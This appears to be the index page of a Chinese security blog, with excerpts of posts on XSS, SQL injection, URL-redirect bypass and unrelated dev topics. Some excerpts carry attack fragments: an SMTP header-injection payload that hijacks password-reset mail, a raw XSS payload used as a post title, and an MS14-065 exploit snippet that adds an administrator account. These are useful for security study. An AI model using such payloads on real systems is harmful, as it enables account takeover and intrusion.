CC's Blog

原创 安卓11安装Burp证书

记录下安卓11上安装Burp证书的过程：手机解锁BootLoader和Root。直接参考网上教程给手机配置上Burp的代理地址，下载Burp证书，安装至用户凭据在Magisk上安装Move Certificates模块，安装成功后用户分区的所有证书默认会导入到系统分到「受信任的凭据」下，可以看到已经安装成功了...

原创 利用SMTP头注入劫持找回密码邮件

原Blog: http://blog.jr0ch17.com/2018/Please-email-me-your-password/思路： 利用SMTP头注入，将攻击者email地址添加为CC或BCC，从而劫持到比如找回密码邮件（需要目标业务未对邮件地址做校验就发邮件，利用场景有限）Payload： valid_user_address%40company.com%0D%0ABCC%3...

原创 git: missing xcrun

把Mac升级到了macOS High Sierra，发现终端下git用不了了

转载 Java反射机制详解

Java反射机制详解

原创 Serialization和Marshalling的区别

见到的关于 Serialization and Marshalling 的最好的解释

原创 利用URL特性绕过域名白名单检测

URL跳转漏洞主要是利用浏览器对URL特性的支持，绕过一些正则匹配不严谨的防护。

原创 URL跳转漏洞的危害

一直以来，对URL跳转漏洞的理解，仅限于钓鱼、欺骗等，无法影响到当前业务。但前几天看到一个漏洞，让我对URL跳转的危害理解又加深了一层。 对于URL跳转漏洞来说，某些URL跳转的方式可以带着HTTP referer头，这就会使得一些依赖referer校验的安全解决方案失效，比如仅做了referer校验的jsonp接口。这种问题不产生直接危害，但可能造成其他安全防护功能的绕过。

原创 '"><img src=1 onerror=console.log('XSS')>

原创 Windows下查询域名的DNS TXT记录的命令

总记不住域名的DNS TXT记录查询命令，每次都去搜。。这里Mark一下快速查询-非交互式nskookup -q=TXT yourdomain.com 交互式查询nslookup set q=TXT yourdomain.com For more details, please refer: https://blogs.technet.microsoft.com/rmilne/2015/09

原创 eclipse配置tomcat8.5

在eclipse中，当使用tomcat版本为8.5时（一个神奇的版本），无法与eclipse绑定，选择8.0或9.0版本都会提示：The Apache Tomcat installation at this directory is version 8.5.5.  A Tomcat 8.0 installation is expected.如下图：

原创 Hidden属性的input标签中XSS的触发方法

今天看到一个XSS漏洞，插入点在一个有hidden 属性的input 标签，大致情况如下：<input type="hidden" name="returnurl" value="[USER INJECT]" />正常情况下的XSS应当是： http://victim/?value=” onclick=”alert(document.domain)但是这里由于该input 未在页面中显示，常用

原创 屏蔽第三方网站中的百度广告和百度推荐

在Hosts中绑定下面的配置，会让百度广告和百度推荐不再显示：#百度推广&百度推荐127.0.0.1 pos.baidu.com127.0.0.1 eclick.baidu.com127.0.0.1 crs.baidu.com（域名列表应该还有遗漏的）效果：屏蔽前：屏蔽后：

原创 DiscuzX3.2批量添加用户脚本

有需求往DiscuzX3.2中批量添加用户，搜到一个脚本，http://blog.csdn.net/zhongping136/article/details/46730191但是测试无法添加成功，分析了下原因：1. 打印返回页面，发现报错：抱歉，您的请求来路不正确或表单验证串不符，无法提交搜了下这句话的位置，在文件：Discuz!X3.2\source\language\lang_

转载 Windows下自带端口转发功能

windows系统，包括xp,2003,2008等(测试2012也支持)，都自带portproxy功能，目前只支持tcp协议的端口转发。

原创 Flask安装过程中“配置虚拟环境”步骤报错，找不到activate.bat

按正常步骤安全Flask，在进行到“配置虚拟环境”步骤时，执行命令“virtualenv myvir”发现报错：OSError: Command D:\myvir\Scripts\python.exe -c "import sys, pip; sys...d\"] + sys.argv[1:]))" setuptools pip wheel failed with error code 1

原创 一个很有意思的姿势——RFD

RFD = Reflected File Download这是BlackHat2014的一个演讲，PPT：https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf作者介绍RFD的文章：https://www.trustwave.c

原创 Python刷CSDN博客脚本v2.0

.

转载 SQL注入速查表（下）与Oracle注入速查表

一、SQL注入速查表（下）0x00 目录盲注关于盲注实战中的盲注实例延时盲注WAITFOR DELAY [time](S)实例BENCHMARK()(M)实例pg_sleep(seconds)(P)掩盖痕迹-sp_password log bypass(S)注入测试一些其他的MySQL笔记MySQL中好用的函数SQL注入的高级使用

转载 SQL注入速查表（上）

本文由Yinzo翻译，转载请保留署名。原文地址：http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#Enablecmdshell文档版本：1.40x00 关于SQL注入速查表现在仅支持MySQL、Microsoft SQL Server，以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个

转载 IIS架构

1.   概述为了提高IIS的可靠性，安全性以及可用性，与IIS5.0和以前更早的版本不同，IIS6.0提供了一个全新的IIS架构。这个架构的详细情况如下图所示：                                          （图 1） IIS 6.0整体架构由上可以看出，IIS 6.0的内核体系主要由如下三个组件构成：HTTP.SYS，W3SVC以

原创 MS14-065 添加用户并提升至管理员 EXP

MS14-065,添加用户并提升到管理员，IE onlyfunction runmumaa() On Error Resume Nextset shell=createobject("Shell.Application")shell.ShellExecute "net.exe","user test test /ad"shell.ShellExecute "net.exe","loc

原创 Unicode转义的特性

在浏览器支持的tkwk\u0061lert(1);

原创 src属性在IE6下的特性

看这段代码：

原创 嵌入式CSS或script中标签闭合对引号的突破

直接上代码： test{ background: url('http://www.baidu.com/aaaa'); } bbb

原创 无指定协议名时，浏览器对URL的解析

在URL中，如果未指定协议名，如http、https等

转载 False SQL Injection and Advanced Blind SQL Injection

转自：http://www.exploit-db.com/papers/18263/

转载 Web应用里的HTTP参数污染（HPP）漏洞

HPP是HTTP Parameter Pollution的缩写。这个漏洞由S. di Paola 与L. Caret Toni在2009年的OWASP上首次公布。这也是一种注入型的漏洞，攻击者通过在HTTP请求中插入特定的参数来发起攻击。如果Web应用中存在这样的漏洞，可以被攻击者利用来进行客户端或者服务器端的攻击。下面对这个漏洞的原理做一下详细解释。 首先讲下HTTP的参数处理

原创 PHP彩蛋

今天看到XDCTF2014的Wirteup才知道php还有这么个玩意：

原创 Javascript中parseInt在XSS中的应用

XSS挑战赛第12题：http://prompt.ml/12，用了parseInt这个函数

转载 XSS Funny Vector Review

HTML3与HTML5混搭 xIE的VML中的标签. click这个是Firefix对feed协议处理不当导致的,不知道算不算bug,但用来绕过A标签的协议检测倒是个不错的办法. click可以绕过不少xss filter,不过IE不支持这个实体字符. &#97&#4&#6&#401)SVG解析script时会将其

转载 jsonp详解

json相信大家都用的多，jsonp我就一直没有机会用到，但也经常看到，只知道是“用来跨域的”，一直不知道具体是个什么东西。今天总算搞明白了。下面一步步来搞清楚jsonp是个什么玩意。同源策略首先基于安全的原因，浏览器是存在同源策略这个机制的，同源策略阻止从一个源加载的文档或脚本获取或设置另一个源加载的文档的属性。看起来不知道什么意思，实践一下就知道了。1.随便建两个网页一个端

翻译 使用HTML5和JS-Recon进行端口扫描

这是一个发表在BlackHat大会上的最新话题。HTML5有两个API可以实现跨域的调用：Cross Origin Requests和WebSockets。JavaScript可使用其与任何IP、任意端口（被阻止的除外）进行连接，这使其成为端口扫描的一个选择。这两个API都包含readyState属性，它表示在给定时间内的连接状态。每个特定的readyState值的持续时长很大程度上是基于到目

转载 关于渗透测试

今天看到某安全公司网站上

转载 PHP5.4中删除的安全函数

前几天配置PHP5.4的时候发现PHP新版已经在一些安全函数方面进行了增改，从php自身防止一些不必要的漏洞，因此开发人员在写代码时也需要注意版本的兼容。下面讲几个涉及安全方面的函数进行说明。1、safe_mode状态：已删除描述：此函数主要限制系统相关的文件打开、命令执行等函数(具体影响函数见参考1)。当然现在也有bypasss safe_mode的方法(见参考2)，通过com接口来

原创 备忘：Visio2013中插入公式

1.在Word2013中插入公式，编辑完成后，复制2.在Vision空白处右键，选择

转载 PHP magic_quotes_gpc的详细使用方法

1.条件： PHP magic_quotes_gpc=off写入数据库的字符串未经过任何过滤处理。从数据库读出的字符串也未作任何处理。数据： $data="snow''''sun" ; (snow和sun之间是四个连续的单引号).操作： 将字符串:"snow''''sun" 写入数据库，结果： 出现sql语句错误，mysql不能顺利完成sql语句，写入数据库失败。数

原创 CSDN博客去图片水印

刚刚写博客，上传图片的时候忘了选“无水印”了，看着tve

原创 Windows80端口被占用解决办法

今天有需求要把原来WAMP的8080端口改成80，配置完

转载 bash快捷操作

生活在 Bash shell 中，熟记以下快捷键，将极大的提高你的命令行操作效率。编辑命令    Ctrl + a ：移到命令行首    Ctrl + e ：移到命令行尾    Ctrl + f ：按字符前移（右向）    Ctrl + b ：按字符后移（左向）    Alt + f ：按单词前移（右向）    Alt + b ：按单词后移（左向） 

转载 正则表达式30分钟入门教程

首页 | 常用正则表达式 | 正则表达式测试工具正则表达式30分钟入门教程版本：v2.33 (2013-1-10) 作者：deerchao 转载请注明来源目录跳过目录本文目标如何使用本教程正则表达式到底是什么东西？入门测试正则表达式元字符字符转义重复字符类分枝条件反义分组后向引用零宽断言负向零宽断言注释贪婪与懒惰处理选项平衡组/递归匹配还有些什么东西没提到联系作